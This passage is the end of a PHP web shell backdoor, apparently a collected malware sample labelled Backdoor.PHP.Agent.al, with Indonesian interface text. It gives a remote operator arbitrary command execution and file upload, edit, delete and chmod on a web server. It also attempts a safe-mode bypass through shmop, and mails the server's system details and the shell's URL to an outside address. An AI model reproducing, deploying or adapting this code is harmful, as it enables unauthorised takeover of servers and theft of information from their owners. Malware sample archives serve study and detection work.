'&chmod=' + o + \"\";";
|
||||||
|
echo "}";
|
||||||
|
echo "}";
|
||||||
|
echo "function Rename(chdir, file, mode) {";
|
||||||
|
echo "if (mode == 'edit') {";
|
||||||
|
echo "var o = prompt('Ganti Nama File '+ file + ' menjadi:', '');";
|
||||||
|
echo "}";
|
||||||
|
echo "else {";
|
||||||
|
echo "var o = prompt('Ganti Nama Folder '+ file + ' menjadi:', '');";
|
||||||
|
echo "}";
|
||||||
|
echo "if (o) {";
|
||||||
|
echo "window.location=\"\" + '{$fstring}&action=rename&chdir=' + chdir + '&file=' + file +
|
||||||
|
|
||||||
|
'&newname=' + o + '&mode=' + mode +\"\";";
|
||||||
|
echo "}";
|
||||||
|
echo "}";
|
||||||
|
echo "function Copy(chdir, file) {";
|
||||||
|
echo "var o = prompt('Copied for:', '/tmp/' + file);";
|
||||||
|
echo "if (o) {";
|
||||||
|
echo "window.location=\"\" + '{$fstring}&action=copy&chdir=' + chdir + '&file=' + file +
|
||||||
|
|
||||||
|
'&fcopy=' + o + \"\";";
|
||||||
|
echo "}";
|
||||||
|
echo "}";
|
||||||
|
echo "function Mkdir(chdir) {";
|
||||||
|
echo "var o = prompt('Nama Folder?', 'Folder_Baru');";
|
||||||
|
echo "if (o) {";
|
||||||
|
echo "window.location=\"\" + '{$fstring}&action=mkdir&chdir=' + chdir + '&newdir=' + o +
|
||||||
|
|
||||||
|
\"\";";
|
||||||
|
echo "}";
|
||||||
|
echo "}";
|
||||||
|
echo "function Newfile(chdir) {";
|
||||||
|
echo "var o = prompt('Nama File?', 'File_Baru.txt');";
|
||||||
|
echo "if (o) {";
|
||||||
|
echo "window.location=\"\" + '{$fstring}&action=newfile&chdir=' + chdir + '&newfile=' + o +
|
||||||
|
|
||||||
|
\"\";";
|
||||||
|
echo "}";
|
||||||
|
echo "}";
|
||||||
|
echo "</script>";
|
||||||
|
|
||||||
|
// End JavaScript
|
||||||
|
|
||||||
|
/* Functions */
|
||||||
|
function cmd($CMDs) {
|
||||||
|
$CMD[1] = '';
|
||||||
|
exec($CMDs, $CMD[1]);
|
||||||
|
if (empty($CMD[1])) {
|
||||||
|
$CMD[1] = shell_exec($CMDs);
|
||||||
|
}
|
||||||
|
elseif (empty($CMD[1])) {
|
||||||
|
$CMD[1] = passthru($CMDs);
|
||||||
|
}
|
||||||
|
elseif (empty($CMD[1])) {
|
||||||
|
$CMD[1] = system($CMDs);
|
||||||
|
}
|
||||||
|
elseif (empty($CMD[1])) {
|
||||||
|
$handle = popen($CMDs, 'r');
|
||||||
|
while(!feof($handle)) {
|
||||||
|
$CMD[1][] .= fgets($handle);
|
||||||
|
}
|
||||||
|
pclose($handle);
|
||||||
|
}
|
||||||
|
return $CMD[1];
|
||||||
|
}
|
||||||
|
|
||||||
|
if (@$_GET['chdir']) {
|
||||||
|
$chdir = $_GET['chdir'];
|
||||||
|
} else {
|
||||||
|
$chdir = getcwd()."/";
|
||||||
|
}
|
||||||
|
if (@chdir("$chdir")) {
|
||||||
|
$msg = "<font color=\"#008000\"> Pintu Masuk ke Direktori, OK!</font>";
|
||||||
|
} else {
|
||||||
|
$msg = "<font color=\"#FF0000\">Error: Gagal memasukkan ke folder!</font>";
|
||||||
|
$chdir = str_replace($SCRIPT_NAME, "", $_SERVER['SCRIPT_NAME']);
|
||||||
|
}
|
||||||
|
$chdir = str_replace(chr(92), chr(47), $chdir);
|
||||||
|
|
||||||
|
if (@$_GET['action'] == 'upload') {
|
||||||
|
$uploaddir = $chdir;
|
||||||
|
$uploadfile = $uploaddir. $_FILES['userfile']['name'];
|
||||||
|
if (@move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir .
|
||||||
|
|
||||||
|
$_FILES['userfile']['name'])) {
|
||||||
|
$msg = "<font color=\"#008000\"><font
|
||||||
|
|
||||||
|
color=\"#000080\">{$_FILES['userfile']['name']}</font>, arsip valid, sukses dimuat.
|
||||||
|
|
||||||
|
</font>";
|
||||||
|
} else {
|
||||||
|
$msg = "<font color=\"#FF0000\">Error: gagal menyalin arsip.</font>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
elseif (@$_GET['action'] == 'mkdir') {
|
||||||
|
$newdir = $_GET['newdir'];
|
||||||
|
if (@mkdir("$chdir"."$newdir")) {
|
||||||
|
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$newdir}</font>, folder
|
||||||
|
|
||||||
|
berhasil dibuat. </font>";
|
||||||
|
} else {
|
||||||
|
$msg = "<font color=\"#FF0000\">Error: Pembuatan folder gagal.</font>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
elseif (@$_GET['action'] == 'newfile') {
|
||||||
|
$newfile = $_GET['newfile'];
|
||||||
|
if (@touch("$chdir"."$newfile")) {
|
||||||
|
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$newfile}</font>, berhasil
|
||||||
|
|
||||||
|
dibuat! </font>";
|
||||||
|
} else {
|
||||||
|
$msg = "<font color=\"#FF0000\">Error: Pembuatan arsip gagal!</font>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
elseif (@$_GET['action'] == 'del') {
|
||||||
|
$file = $_GET['file']; $type = $_GET['type'];
|
||||||
|
if ($type == 'file') {
|
||||||
|
if (@unlink("$chdir"."$file")) {
|
||||||
|
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$file}</font>, Berhasil
|
||||||
|
|
||||||
|
menghapus arsip (file)!</font>";
|
||||||
|
} else {
|
||||||
|
$msg = "<font color=\"#FF0000\">Error: Gagal menghapus arsip (file)!</font>";
|
||||||
|
}
|
||||||
|
} elseif ($type == 'dir') {
|
||||||
|
if (@rmdir("$chdir"."$file")) {
|
||||||
|
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$file}</font>, Berhasil
|
||||||
|
|
||||||
|
menghapus folder!</font>";
|
||||||
|
} else {
|
||||||
|
$msg = "<font color=\"#FF0000\">Error: Gagal menghapus folder!</font>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
elseif (@$_GET['action'] == 'chmod') {
|
||||||
|
$file = $chdir.$_GET['file']; $chmod = $_GET['chmod'];
|
||||||
|
if (@chmod ("$file", $chmod)) {
|
||||||
|
|
||||||
|
$msg = "<font color=\"#008000\">Chmod dari</font> <font
|
||||||
|
|
||||||
|
color=\"#000080\">{$_GET['file']}</font> <font color=\"#008000\">berubah menjadi</font>
|
||||||
|
|
||||||
|
|
||||||
|
<font color=\"#000080\">$chmod</font> <font color=\"#008000\">: Sukses!</font>";
|
||||||
|
} else {
|
||||||
|
$msg = '<font color=\"#FF0000\">Error: Gagal mengubah chmod.</font>';
|
||||||
|
}
|
||||||
|
}
|
||||||
|
elseif (@$_GET['action'] == 'rename') {
|
||||||
|
$file = $_GET['file']; $newname = $_GET['newname'];
|
||||||
|
if (@rename("$chdir"."$file", "$chdir"."$newname")) {
|
||||||
|
$msg = "<font color=\"#008000\">Archive</font> <font color=\"#000080\">{$file}</font>
|
||||||
|
|
||||||
|
<font color=\"#008000\">named for</font> <font color=\"#000080\">{$newname}</font> <font
|
||||||
|
|
||||||
|
color=\"#008000\">successfully!</font>";
|
||||||
|
} else {
|
||||||
|
$msg = "<font color=\"#FF0000\">Error: Gagal mencalonkan arsip.</font>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
elseif (@$_GET['action'] == 'copy') {
|
||||||
|
$file = $chdir.$_GET['file']; $copy = $_GET['fcopy'];
|
||||||
|
if (@copy("$file", "$copy")) {
|
||||||
|
$msg = "<font color=\"#000080\">{$file}</font>, <font color=\"#008000\">disalin
|
||||||
|
|
||||||
|
menjadi</font> <font color=\"#000080\">{$copy}</font> <font color=\"#008000\">
|
||||||
|
|
||||||
|
|
||||||
|
Berhasil!</font>";
|
||||||
|
} else {
|
||||||
|
$msg = "<font color=\"#FF0000\">Error: Gagal menyalin </font> <font
|
||||||
|
|
||||||
|
color=\"#000000\">{$file}</font> <font color=\"#FF0000\">menjadi</font> <font
|
||||||
|
|
||||||
|
color=\"#000000\">{$copy}</font></font>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
/* Parte Atualiza 02:48 12/2/2006 */
|
||||||
|
|
||||||
|
elseif (@$_GET['action'] == 'cmd') {
|
||||||
|
if (!empty($_GET['cmd'])) { $cmd = @$_GET['cmd']; }
|
||||||
|
if (!empty($_POST['cmd'])) { $cmd = @$_POST['cmd']; }
|
||||||
|
$cmd = stripslashes(trim($cmd));
|
||||||
|
$result_arr = cmd($cmd);
|
||||||
|
|
||||||
|
$afim = count($result_arr); $acom = 0; $msg = '';
|
||||||
|
$msg .= "<p style=\"color: #000000;text-align: center;font-family: 'Lucida
|
||||||
|
|
||||||
|
Console';font-size: 12px;margin 2\">Hasil : <b>".$cmd."</b></p>";
|
||||||
|
if ($result_arr) {
|
||||||
|
while ($acom <= $afim) {
|
||||||
|
$msg .= "<p style=\"color: #008000;text-align: left;font-family:
|
||||||
|
|
||||||
|
'Lucida Console';font-size: 12px;margin 2\"> ".@$result_arr[$acom]."</p>";
|
||||||
|
$acom++;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
$msg .= "<p style=\"color: #FF0000;text-align: center;font-family: 'Lucida
|
||||||
|
|
||||||
|
Console';font-size: 12px;margin 2\">Error: Gagal mengeksekusi perintah.</p>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
elseif (@$_GET['action'] == 'safemode') {
|
||||||
|
if (@!extension_loaded('shmop')) {
|
||||||
|
echo "Loading... module</br>";
|
||||||
|
|
||||||
|
if (strtoupper(substr(PHP_OS, 0,3) == 'WIN')) {
|
||||||
|
@dl('php_shmop.dll');
|
||||||
|
} else {
|
||||||
|
@dl('shmop.so');
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if (@extension_loaded('shmop')) {
|
||||||
|
echo "Module: <b>shmop</b> loaded!</br>";
|
||||||
|
|
||||||
|
$shm_id = @shmop_open(0xff2, "c", 0644, 100);
|
||||||
|
if (!$shm_id) { echo "Couldn't create shared memory segment\n"; }
|
||||||
|
$data="\x00";
|
||||||
|
$offset=-3842685;
|
||||||
|
$shm_bytes_written = @shmop_write($shm_id, $data, $offset);
|
||||||
|
if ($shm_bytes_written != strlen($data)) { echo "Couldn't write the entire length of
|
||||||
|
|
||||||
|
data\n"; }
|
||||||
|
if (!shmop_delete($shm_id)) { echo "Couldn't mark shared memory block for deletion."; }
|
||||||
|
echo passthru("id");
|
||||||
|
shmop_close($shm_id);
|
||||||
|
|
||||||
|
|
||||||
|
} else { echo "Module: <b>shmop</b> tidak dimuat!</br>"; }
|
||||||
|
}
|
||||||
|
|
||||||
|
elseif (@$_GET['action'] == 'zipen') {
|
||||||
|
$file = $_GET['file'];
|
||||||
|
$zip = @zip_open("$chdir"."$file");
|
||||||
|
$msg = '';
|
||||||
|
if ($zip) {
|
||||||
|
|
||||||
|
while ($zip_entry = zip_read($zip)) {
|
||||||
|
$msg .= "Name: " . zip_entry_name($zip_entry) . "\n";
|
||||||
|
$msg .= "Actual Filesize: " . zip_entry_filesize($zip_entry) . "\n";
|
||||||
|
$msg .= "Compressed Size: " . zip_entry_compressedsize($zip_entry) . "\n";
|
||||||
|
$msg .= "Compression Method: " . zip_entry_compressionmethod($zip_entry) . "\n";
|
||||||
|
|
||||||
|
if (zip_entry_open($zip, $zip_entry, "r")) {
|
||||||
|
echo "File Contents:\n";
|
||||||
|
$buf = zip_entry_read($zip_entry, zip_entry_filesize($zip_entry));
|
||||||
|
echo "$buf\n";
|
||||||
|
|
||||||
|
zip_entry_close($zip_entry);
|
||||||
|
}
|
||||||
|
echo "\n";
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
zip_close($zip);
|
||||||
|
|
||||||
|
}
|
||||||
|
}
|
||||||
|
elseif (@$_GET['action'] == 'edit') {
|
||||||
|
$file = $_GET['file'];
|
||||||
|
$conteudo = '';
|
||||||
|
$filename = "$chdir"."$file";
|
||||||
|
$conteudo = @file_get_contents($filename);
|
||||||
|
$conteudo = htmlspecialchars($conteudo);
|
||||||
|
$back = $_SERVER['HTTP_REFERER'];
|
||||||
|
echo "<p align=\"center\">Editing {$file} ...</p>";
|
||||||
|
echo "<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse:
|
||||||
|
|
||||||
|
collapse\" width=\"100%\" id=\"editacao\">";
|
||||||
|
echo "<tr>";
|
||||||
|
echo "<td width=\"100%\">";
|
||||||
|
echo "<form method=\"POST\"
|
||||||
|
|
||||||
|
action=\"{$fstring}&action=save&chdir={$chdir}&file={$file}\">";
|
||||||
|
echo "<!--webbot bot=\"SaveResults\" u-file=\"_private/form_results.csv\"
|
||||||
|
|
||||||
|
s-format=\"TEXT/CSV\" s-label-fields=\"TRUE\" --><p align=\"center\">";
|
||||||
|
print "<textarea rows=\"18\" name=\"S1\" cols=\"89\" style=\"font-family: Verdana;
|
||||||
|
|
||||||
|
font-size: 8pt; border: 1px solid #000000\">{$conteudo}</textarea></p>";
|
||||||
|
echo "<p align=\"center\">";
|
||||||
|
echo "<input type=\"submit\" value=\"Simpan\" name=\"B2\" style=\" border: 1px solid
|
||||||
|
|
||||||
|
#000000\"> ";
|
||||||
|
echo "<input type=\"button\" value=\"Tutup\"
|
||||||
|
|
||||||
|
Onclick=\"javascript:window.location='{$fstring}&chdir={$chdir}'\" name=\"B1\" style=\"
|
||||||
|
|
||||||
|
border: 1px solid #000000\"> ";
|
||||||
|
echo "</form>";
|
||||||
|
echo "</td>";
|
||||||
|
echo "</tr>";
|
||||||
|
echo "</table>";
|
||||||
|
}
|
||||||
|
elseif (@$_GET['action'] == 'save') {
|
||||||
|
$filename = "$chdir".$_GET['file'];
|
||||||
|
$somecontent = $_POST['S1'];
|
||||||
|
$somecontent = stripslashes(trim($somecontent));
|
||||||
|
if (is_writable($filename)) {
|
||||||
|
@$handle = fopen ($filename, "w");
|
||||||
|
@$fw = fwrite($handle, $somecontent);
|
||||||
|
@fclose($handle);
|
||||||
|
if ($handle && $fw) {
|
||||||
|
$msg = "<font color=\"#000080\">{$_GET['file']}</font>, <font
|
||||||
|
|
||||||
|
color=\"#008000\">berhasil diedit!</font>";
|
||||||
|
}
|
||||||
|
} else {
|
||||||
|
$msg = "<font color=\"#000000\">{$_GET['file']},</font> <font color=\"#FF0000\">tidak
|
||||||
|
|
||||||
|
bisa ditulisi!</font>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Informaçs
|
||||||
|
$cmdget = '';
|
||||||
|
if (!empty($_GET['cmd'])) { $cmdget = @$_GET['cmd']; }
|
||||||
|
if (!empty($_POST['cmd'])) { $cmdget = @$_POST['cmd']; }
|
||||||
|
$cmdget = htmlspecialchars($cmdget);
|
||||||
|
function asdads() {
|
||||||
|
$asdads = '';
|
||||||
|
if (@file_exists("/usr/bin/wget")) { $asdads .= "wget "; }
|
||||||
|
if (@file_exists("/usr/bin/fetch")) { $asdads .= "fetch "; }
|
||||||
|
if (@file_exists("/usr/bin/curl")) { $asdads .= "curl "; }
|
||||||
|
if (@file_exists("/usr/bin/GET")) { $asdads .= "GET "; }
|
||||||
|
if (@file_exists("/usr/bin/lynx")) { $asdads .= "lynx "; }
|
||||||
|
return $asdads;
|
||||||
|
}
|
||||||
|
|
||||||
|
echo "<form method=\"POST\" name=\"cmd\"
|
||||||
|
|
||||||
|
action=\"{$fstring}&action=cmd&chdir=$chdir\">";
|
||||||
|
echo "<fieldset style=\"border: 1px solid #000000; padding: 2\">";
|
||||||
|
echo "<legend>Informasi</legend>";
|
||||||
|
echo "<br><table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse:
|
||||||
|
|
||||||
|
collapse; font-family: Verdana; font-size: 10px\" width=\"100%\">";
|
||||||
|
echo "<tr>";
|
||||||
|
echo "<td width=\"8%\">";
|
||||||
|
echo " <b>Sistem </b> </td> ";
|
||||||
|
echo "<td width=\"92%\">: {$OS}</td>";
|
||||||
|
echo "</tr>";
|
||||||
|
echo "<tr>";
|
||||||
|
echo "<td width=\"8%\">";
|
||||||
|
echo " <b>Nama </b></td> ";
|
||||||
|
echo "<td width=\"92%\">: {$UNAME}</td>";
|
||||||
|
echo "</tr>";
|
||||||
|
echo "<tr>";
|
||||||
|
echo "<td width=\"8%\">";
|
||||||
|
echo " <b>PHP </b></td> ";
|
||||||
|
echo "<td width=\"92%\">: {$PHPv}, <b> Safe Mode :</b> {$SafeMode}</td>";
|
||||||
|
echo "</tr>";
|
||||||
|
if (strtoupper(substr($OS, 0,3) != 'WIN')) {
|
||||||
|
$Methods = asdads();
|
||||||
|
if ($Methods == '') { $Methods = "???"; }
|
||||||
|
echo "<tr>";
|
||||||
|
echo "<td width=\"8%\">";
|
||||||
|
echo "<b>Methods </b></td> ";
|
||||||
|
echo "<td width=\"92%\">: {$Methods}</td>";
|
||||||
|
echo "</tr>";
|
||||||
|
}
|
||||||
|
|
||||||
|
echo "<tr>";
|
||||||
|
echo "<td width=\"8%\">";
|
||||||
|
echo " <b>IP </b></td> ";
|
||||||
|
echo "<td width=\"92%\">: {$IpServer}</td>";
|
||||||
|
echo "</tr>";
|
||||||
|
echo "<tr>";
|
||||||
|
echo "<td width=\"8%\">";
|
||||||
|
echo " <b>Perintah </b></td> ";
|
||||||
|
echo "<td width=\"92%\">: <input type=\"text\" size=\"70\" name=\"cmd\" value=\"{$cmdget}\"
|
||||||
|
|
||||||
|
style=\" font-size: 8 pt; border: 1px solid #000000\"> <input type=\"submit\"
|
||||||
|
|
||||||
|
name=\"action\" value=\"Kirim\" style=\" font-size: 8 pt; border: 1px solid
|
||||||
|
|
||||||
|
#000000\"></td>";
|
||||||
|
echo "</tr>";
|
||||||
|
echo "</table><br>";
|
||||||
|
echo "</fieldset></form>";
|
||||||
|
// Dir
|
||||||
|
|
||||||
|
echo "<form method=\"POST\" action=\"{$fstring}&action=upload&chdir=$chdir\"
|
||||||
|
|
||||||
|
enctype=\"multipart/form-data\">";
|
||||||
|
echo "<!--webbot bot=\"FileUpload\" u-file=\"_private/form_results.csv\"
|
||||||
|
|
||||||
|
s-format=\"TEXT/CSV\" s-label-fields=\"TRUE\" --><fieldset style=\"border: 1px solid
|
||||||
|
|
||||||
|
#000000; padding: 2\">";
|
||||||
|
if (is_writable("$chdir")) {
|
||||||
|
if (strtoupper(substr($OS, 0,3) == 'WIN')) {
|
||||||
|
echo "<legend>Dir <b>YES</b>: {$chdir} - <a href=\"#[New Dir]\"
|
||||||
|
|
||||||
|
onclick=\"Mkdir('{$chdir}');\">Folder Baru</a> | <a href=\"#[New File]\"
|
||||||
|
|
||||||
|
onclick=\"Newfile('{$chdir}')\">File Baru</a> | <a
|
||||||
|
|
||||||
|
href=\"{$fstring}&action=cmd&chdir={$chdir}&cmd=$newuser\">Remote
|
||||||
|
|
||||||
|
Access</a></legend>";
|
||||||
|
} else {
|
||||||
|
echo "<legend>Dir <b>YES</b>: {$chdir} - <a href=\"#[New Dir]\"
|
||||||
|
|
||||||
|
onclick=\"Mkdir('{$chdir}');\">Folder Baru</a> | <a href=\"#[New File]\"
|
||||||
|
|
||||||
|
onclick=\"Newfile('{$chdir}')\">File Baru</a> | <a
|
||||||
|
|
||||||
|
href=\"{$fstring}&action=backtool&chdir={$chdir}&write=yes\">Kembali</a></legend
|
||||||
|
|
||||||
|
>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
if (strtoupper(substr($OS, 0,3) == 'WIN')) {
|
||||||
|
echo "<legend>Dir NO: {$chdir} - <a href=\"#[New Dir]\"
|
||||||
|
|
||||||
|
onclick=\"Mkdir('{$chdir}');\">Foldr Baru</a> | <a href=\"#[New File]\"
|
||||||
|
|
||||||
|
onclick=\"Newfile('{$chdir}')\">File Baru</a> | <a
|
||||||
|
|
||||||
|
href=\"{$fstring}&action=cmd&chdir={$chdir}&cmd={$newuser}\">Remote
|
||||||
|
|
||||||
|
Access</a></legend>";
|
||||||
|
} else {
|
||||||
|
echo "<legend>Dir NO: {$chdir} - <a href=\"#[New Dir]\"
|
||||||
|
|
||||||
|
onclick=\"Mkdir('{$chdir}');\">Folder Baru</a> | <a href=\"#[New File]\"
|
||||||
|
|
||||||
|
onclick=\"Newfile('{$chdir}')\">File Baru</a> | <a
|
||||||
|
|
||||||
|
href=\"{$fstring}&action=backtool&chdir={$chdir}&write=no\">Kembali</a></legend>
|
||||||
|
|
||||||
|
";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if (@!$handle = opendir("$chdir")) {
|
||||||
|
echo " Gue gak bisa masuk folder, <a href=\"{$fstring}\">Klik sini!</a> untuk embali ke
|
||||||
|
|
||||||
|
folder ori!</br>";
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
echo " <table border=\"0\" cellpadding=\"5\" cellspacing=\"0\" width=\"100%\">";
|
||||||
|
echo " <tr>";
|
||||||
|
echo " <td width=\"100%\" colspan=\"4\"> Upload:";
|
||||||
|
echo " <input type=\"file\" name=\"userfile\" size=\"65\" style=\" border-style:
|
||||||
|
|
||||||
|
solid; border-width: 1\">";
|
||||||
|
echo " <input type=\"submit\" value=\"Kirim\" name=\"B1\" style=\" border: 1px solid
|
||||||
|
|
||||||
|
#000000\"></td>";
|
||||||
|
echo " </tr>";
|
||||||
|
echo " <tr>";
|
||||||
|
echo " <td width=\"100%\" colspan=\"4\"> </td>";
|
||||||
|
echo " </tr>";
|
||||||
|
echo " <tr>";
|
||||||
|
echo " <td width=\"100%\" colspan=\"4\">";
|
||||||
|
if (@!$msg) {
|
||||||
|
echo " <p align=\"left\">Messages</td>";
|
||||||
|
} else {
|
||||||
|
echo " <p align=\"left\">$msg</td>";
|
||||||
|
}
|
||||||
|
echo " </tr>";
|
||||||
|
echo " <tr>";
|
||||||
|
echo " <td width=\"100%\" colspan=\"4\"> </td>";
|
||||||
|
echo " </tr></table> ";
|
||||||
|
echo " <table border=\"1\" cellpadding=\"2\" cellspacing=\"0\" width=\"100%\">";
|
||||||
|
echo " <tr bgcolor=\"#FF6600\" align=\"center\"> ";
|
||||||
|
echo " <td > Permision</td>";
|
||||||
|
echo " <td > Nama File </td>";
|
||||||
|
echo " <td > Kapasitas </td>";
|
||||||
|
echo " <td > Perintah</td>";
|
||||||
|
echo " </tr>";
|
||||||
|
$colorn = 0;
|
||||||
|
while (false !== ($file = readdir($handle))) {
|
||||||
|
if ($file != '.') {
|
||||||
|
if ($colorn == 0) {
|
||||||
|
$color = "style=\"background-color: #FF9900\"";
|
||||||
|
}
|
||||||
|
elseif ($colorn == 1) {
|
||||||
|
$color = "style=\"background-color: #FFCC33\"";
|
||||||
|
}
|
||||||
|
if (@is_dir("$chdir"."$file")) {
|
||||||
|
$file = $file.'/';
|
||||||
|
$mode = 'chdir';
|
||||||
|
} else {
|
||||||
|
$mode = 'edit';
|
||||||
|
}
|
||||||
|
if (@substr("$chdir", strlen($chdir) -1, 1) != '/') {
|
||||||
|
$chdir .= '/';
|
||||||
|
}
|
||||||
|
if ($file == '../') {
|
||||||
|
$lenpath = strlen($chdir); $baras = 0;
|
||||||
|
for ($i = 0;$i < $lenpath;$i++) { if ($chdir{$i} == '/') { $baras++; } }
|
||||||
|
$chdir_ = explode("/", $chdir);
|
||||||
|
$chdirpox = str_replace($chdir_[$baras-1].'/', "", $chdir);
|
||||||
|
}
|
||||||
|
$perms = @fileperms ("$chdir"."$file");
|
||||||
|
if ($perms == '') {
|
||||||
|
$perms = '???';
|
||||||
|
}
|
||||||
|
$size = @filesize ("$chdir"."$file");
|
||||||
|
$size = $size / 1024;
|
||||||
|
$size = explode(".", $size);
|
||||||
|
if (@$size[1] != '') {
|
||||||
|
$size = $size[0].'.'.@substr("$size[1]", 0, 2);
|
||||||
|
} else {
|
||||||
|
$size = $size[0];
|
||||||
|
}
|
||||||
|
if ($size == 0) {
|
||||||
|
if ($mode == 'chdir') {
|
||||||
|
$size = '???';
|
||||||
|
}
|
||||||
|
}
|
||||||
|
echo "<tr>";
|
||||||
|
echo "<td align=\"center\" $color> $perms</td>";
|
||||||
|
if (@is_writable ("$chdir"."$file")) {
|
||||||
|
if ($mode == 'chdir') {
|
||||||
|
if ($file == '../') {
|
||||||
|
echo "<td $color> <b><a href=\"{$fstring}&chdir=$chdirpox\"><font
|
||||||
|
|
||||||
|
color=\"#008000\">$file</font></a></b> </td>";
|
||||||
|
} else {
|
||||||
|
echo "<td $color> <b><a href=\"{$fstring}&chdir={$chdir}{$file}\"><font
|
||||||
|
|
||||||
|
color=\"#008000\">$file</font></a> </b></td>";
|
||||||
|
}
|
||||||
|
} else {
|
||||||
|
if (is_readable("$chdir"."$file")) {
|
||||||
|
echo "<td $color> <a
|
||||||
|
|
||||||
|
href=\"{$fstring}&action=edit&chdir=$chdir&file=$file\">$file</a> </td>";
|
||||||
|
} else {
|
||||||
|
echo "<td $color> $file </td>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
if ($mode == 'chdir') {
|
||||||
|
if ($file == '../') {
|
||||||
|
echo "<td $color> <a href=\"{$fstring}&chdir=$chdirpox\">$file</a>
|
||||||
|
|
||||||
|
|
||||||
|
</td>";
|
||||||
|
} else {
|
||||||
|
echo "<td $color> <a
|
||||||
|
|
||||||
|
href=\"{$fstring}&chdir={$chdir}{$file}\">$file</a></td>";
|
||||||
|
}
|
||||||
|
} else {
|
||||||
|
if (@is_readable("$chdir"."$file")) {
|
||||||
|
echo "<td $color> <a
|
||||||
|
|
||||||
|
href=\"{$fstring}&action=edit&chdir=$chdir&file=$file\">$file</a> </td>";
|
||||||
|
} else {
|
||||||
|
echo "<td $color> $file</td>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
echo "<td align=\"right\" $color> $size KB</td>";
|
||||||
|
if ($mode == 'edit') {
|
||||||
|
echo "<td align=\"center\" $color> <a href=\"#{$file}\"
|
||||||
|
|
||||||
|
onclick=\"Rename('{$chdir}', '{$file}', '{$mode}')\">Rename</a> | <a
|
||||||
|
|
||||||
|
href=\"{$fstring}&action=del&chdir={$chdir}&file={$file}&type=file\">Del</a>
|
||||||
|
|
||||||
|
|
||||||
|
| <a href=\"#{$file}\" onclick=\"ChMod('$chdir', '$file')\">Chmod</a> | <a href=\"#{$file}\"
|
||||||
|
|
||||||
|
onclick=\"Copy('{$chdir}', '{$file}')\">Copy</a> </td>";
|
||||||
|
} else {
|
||||||
|
echo "<td align=\"center\" $color> <a href=\"#{$file}\"
|
||||||
|
|
||||||
|
onclick=\"Rename('{$chdir}', '{$file}', '{$mode}')\">Rename</a> | <a
|
||||||
|
|
||||||
|
href=\"{$fstring}&action=del&chdir={$chdir}&file={$file}&type=dir\">Del</a>
|
||||||
|
|
||||||
|
| <a href=\"#{$file}\" onclick=\"ChMod('$chdir', '$file')\">Chmod</a> | Copy </td>";
|
||||||
|
}
|
||||||
|
echo "</tr>";
|
||||||
|
if ($colorn == 0) {
|
||||||
|
$colorn = 1;
|
||||||
|
}
|
||||||
|
elseif ($colorn == 1) {
|
||||||
|
$colorn = 0;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
closedir($handle);
|
||||||
|
}
|
||||||
|
|
||||||
|
$OS = @PHP_OS;
|
||||||
|
$UNAME = @php_uname();
|
||||||
|
$PHPv = @phpversion();
|
||||||
|
$SafeMode = @ini_get('safe_mode');
|
||||||
|
|
||||||
|
if ($SafeMode == '') { $SafeMode = "<i>OFF</i><BR>"; }
|
||||||
|
else { $SafeMode = "<i>$SafeMode</i><BR>"; }
|
||||||
|
|
||||||
|
|
||||||
|
$injek=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
|
||||||
|
|
||||||
|
$psn=("OS = " . $OS . "<BR>UNAME = " . $UNAME . "<BR>PHPVersion = " . $PHPv . "<BR>Safe
|
||||||
|
|
||||||
|
Mode = " . $SafeMode . "<BR><font color=blue>http://" . $injek . "</font><BR>Ingat jangan
|
||||||
|
|
||||||
|
pakai Injek Ini.<BR>By: binushacker");
|
||||||
|
|
||||||
|
$header = "From: $_SERVER[SERVER_ADMIN] <$from>\r\nReply-To: $replyto\r\n";
|
||||||
|
$header .= "MIME-Version: 1.0\r\n";
|
||||||
|
If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
|
||||||
|
If ($file_name) $header .= "--$uid\r\n";
|
||||||
|
$header .= "Content-Type: text/$contenttype\r\n";
|
||||||
|
$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
|
||||||
|
$header .= "$message\r\n";
|
||||||
|
If ($file_name) $header .= "--$uid\r\n";
|
||||||
|
If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
|
||||||
|
If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
|
||||||
|
If ($file_name) $header .= "Content-Disposition: attachment;
|
||||||
|
|
||||||
|
filename=\"$file_name\"\r\n\r\n";
|
||||||
|
If ($file_name) $header .= "$content\r\n";
|
||||||
|
If ($file_name) $header .= "--$uid--";
|
||||||
|
$to = ("binushacker@hackermail.com");
|
||||||
|
$subject = ("scan bos");
|
||||||
|
mail($to,$subject,$psn,$header);
|
||||||
|
|
||||||
|
@include "$bn";
|
||||||
|
?>
|
||||||
|
</table>
|
||||||
|
|
||||||
|
</fieldset></form>
|
||||||
|
</div>
|
||||||
|
</body>
|
||||||
|
|
||||||
|
</html>
|
||||||
|
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<img src="http://uv.terra.com.br/UV?c=planeta" width=1 height=1 border=0 alt="" align="left">
|
||||||
|
</html>
|
||||||
|
|
75
PHP/Backdoor.PHP.Agent.al
